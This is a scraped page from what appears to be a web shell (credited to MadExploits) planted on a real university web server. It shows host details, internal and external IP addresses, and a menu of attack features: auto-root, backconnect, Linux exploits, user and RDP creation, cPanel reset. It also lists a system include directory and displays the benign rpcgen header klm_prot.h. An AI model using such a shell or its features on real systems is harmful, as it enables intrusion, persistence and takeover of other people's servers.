Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.139.233.121
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
include /
rpcsvc /
[ HOME SHELL ]
Name
Size
Permission
Action
bootparam.h
917
B
-rw-r--r--
bootparam_prot.h
3.11
KB
-rw-r--r--
bootparam_prot.x
3.05
KB
-rw-r--r--
key_prot.h
6.6
KB
-rw-r--r--
key_prot.x
6.41
KB
-rw-r--r--
klm_prot.h
3.21
KB
-rw-r--r--
klm_prot.x
3.65
KB
-rw-r--r--
mount.h
3.77
KB
-rw-r--r--
mount.x
4.56
KB
-rw-r--r--
nfs_prot.h
11.18
KB
-rw-r--r--
nfs_prot.x
7.8
KB
-rw-r--r--
nis.h
15.83
KB
-rw-r--r--
nis.x
16.41
KB
-rw-r--r--
nis_callback.h
2.64
KB
-rw-r--r--
nis_callback.x
2.13
KB
-rw-r--r--
nis_object.x
12.78
KB
-rw-r--r--
nis_tags.h
5.24
KB
-rw-r--r--
nislib.h
12.59
KB
-rw-r--r--
nlm_prot.h
9.15
KB
-rw-r--r--
nlm_prot.x
4.87
KB
-rw-r--r--
rex.h
5.13
KB
-rw-r--r--
rex.x
7.25
KB
-rw-r--r--
rquota.h
2.2
KB
-rw-r--r--
rquota.x
1.53
KB
-rw-r--r--
rstat.h
3.95
KB
-rw-r--r--
rstat.x
3.91
KB
-rw-r--r--
rusers.h
3.2
KB
-rw-r--r--
rusers.x
5.73
KB
-rw-r--r--
sm_inter.h
3.1
KB
-rw-r--r--
sm_inter.x
3.66
KB
-rw-r--r--
spray.h
1.84
KB
-rw-r--r--
spray.x
2.48
KB
-rw-r--r--
yp.h
9.68
KB
-rw-r--r--
yp.x
7.03
KB
-rw-r--r--
yp_prot.h
10.25
KB
-rw-r--r--
ypclnt.h
3.42
KB
-rw-r--r--
yppasswd.h
1.25
KB
-rw-r--r--
yppasswd.x
2.23
KB
-rw-r--r--
ypupd.h
2.94
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : klm_prot.h
/* * Please do not edit this file. * It was generated using rpcgen. */ #ifndef _KLM_PROT_H_RPCGEN #define _KLM_PROT_H_RPCGEN #include <rpc/rpc.h> #ifdef __cplusplus extern "C" { #endif #define LM_MAXSTRLEN 1024 enum klm_stats { klm_granted = 0, klm_denied = 1, klm_denied_nolocks = 2, klm_working = 3, }; typedef enum klm_stats klm_stats; struct klm_lock { char *server_name; netobj fh; int pid; u_int l_offset; u_int l_len; }; typedef struct klm_lock klm_lock; struct klm_holder { bool_t exclusive; int svid; u_int l_offset; u_int l_len; }; typedef struct klm_holder klm_holder; struct klm_stat { klm_stats stat; }; typedef struct klm_stat klm_stat; struct klm_testrply { klm_stats stat; union { struct klm_holder holder; } klm_testrply_u; }; typedef struct klm_testrply klm_testrply; struct klm_lockargs { bool_t block; bool_t exclusive; struct klm_lock alock; }; typedef struct klm_lockargs klm_lockargs; struct klm_testargs { bool_t exclusive; struct klm_lock alock; }; typedef struct klm_testargs klm_testargs; struct klm_unlockargs { struct klm_lock alock; }; typedef struct klm_unlockargs klm_unlockargs; #define KLM_PROG 100020 #define KLM_VERS 1 #if defined(__STDC__) || defined(__cplusplus) #define KLM_TEST 1 extern klm_testrply * klm_test_1(struct klm_testargs *, CLIENT *); extern klm_testrply * klm_test_1_svc(struct klm_testargs *, struct svc_req *); #define KLM_LOCK 2 extern klm_stat * klm_lock_1(struct klm_lockargs *, CLIENT *); extern klm_stat * klm_lock_1_svc(struct klm_lockargs *, struct svc_req *); #define KLM_CANCEL 3 extern klm_stat * klm_cancel_1(struct klm_lockargs *, CLIENT *); extern klm_stat * klm_cancel_1_svc(struct klm_lockargs *, struct svc_req *); #define KLM_UNLOCK 4 extern klm_stat * klm_unlock_1(struct klm_unlockargs *, CLIENT *); extern klm_stat * klm_unlock_1_svc(struct klm_unlockargs *, struct svc_req *); extern int klm_prog_1_freeresult (SVCXPRT *, xdrproc_t, caddr_t); #else /* K&R C */ #define KLM_TEST 1 extern klm_testrply * klm_test_1(); extern klm_testrply * klm_test_1_svc(); #define KLM_LOCK 2 extern klm_stat * klm_lock_1(); extern klm_stat * klm_lock_1_svc(); #define KLM_CANCEL 3 extern klm_stat * klm_cancel_1(); extern klm_stat * klm_cancel_1_svc(); #define KLM_UNLOCK 4 extern klm_stat * klm_unlock_1(); extern klm_stat * klm_unlock_1_svc(); extern int klm_prog_1_freeresult (); #endif /* K&R C */ /* the xdr functions */ #if defined(__STDC__) || defined(__cplusplus) extern bool_t xdr_klm_stats (XDR *, klm_stats*); extern bool_t xdr_klm_lock (XDR *, klm_lock*); extern bool_t xdr_klm_holder (XDR *, klm_holder*); extern bool_t xdr_klm_stat (XDR *, klm_stat*); extern bool_t xdr_klm_testrply (XDR *, klm_testrply*); extern bool_t xdr_klm_lockargs (XDR *, klm_lockargs*); extern bool_t xdr_klm_testargs (XDR *, klm_testargs*); extern bool_t xdr_klm_unlockargs (XDR *, klm_unlockargs*); #else /* K&R C */ extern bool_t xdr_klm_stats (); extern bool_t xdr_klm_lock (); extern bool_t xdr_klm_holder (); extern bool_t xdr_klm_stat (); extern bool_t xdr_klm_testrply (); extern bool_t xdr_klm_lockargs (); extern bool_t xdr_klm_testargs (); extern bool_t xdr_klm_unlockargs (); #endif /* K&R C */ #ifdef __cplusplus } #endif #endif /* !_KLM_PROT_H_RPCGEN */
Close